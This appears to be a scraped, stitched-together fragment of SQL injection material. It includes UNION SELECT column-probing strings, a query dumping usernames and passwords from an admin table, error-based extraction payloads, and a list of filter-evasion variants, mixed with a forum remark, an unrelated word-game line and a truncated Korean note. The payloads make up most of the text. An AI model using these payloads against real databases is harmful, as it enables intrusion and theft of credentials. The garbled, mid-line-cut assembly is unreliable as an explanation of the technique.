...Null,null,null,null,null,null,null,null,null,null,null,null,null,null,null.
-1 UNION SELECT group_concat(username, 0x3a, password) FROM admin.
So, as it's being used a lot, I would submit my answer. In my opinion, the aim of these requests is to check the presence or absence of a sql injection.
• SQL Injection into a String/Char parameter Example: SELECT * from table where
32)),0x332150,ifnull(full_name,char(32)),0x332150,ifnull(user_name,char(32)),0x332150,ifnull(user_email,char(32)),0x332150,ifnull(pwd,char
union+select+password+from+users+where+1.
+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))). URL will look like
Word Spark search letters: rep) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- SoOx. Enter first three letters from the first row
+--+Union+--+Select+--+ +#uNiOn+#sEleCt+ +union+distinct+select+ +union+distinctROW+select+ +union%23aa%0Aselect+ 0%a0union%a0select%09 %0Aunion%0Aselect%0A
* MySQL 의 경우 : union 과 함께 null 개수를 통해 필드개수를 확인하는 방법이었다. 즉 에러가 발생되지 않는 null 개수만큼이 필드의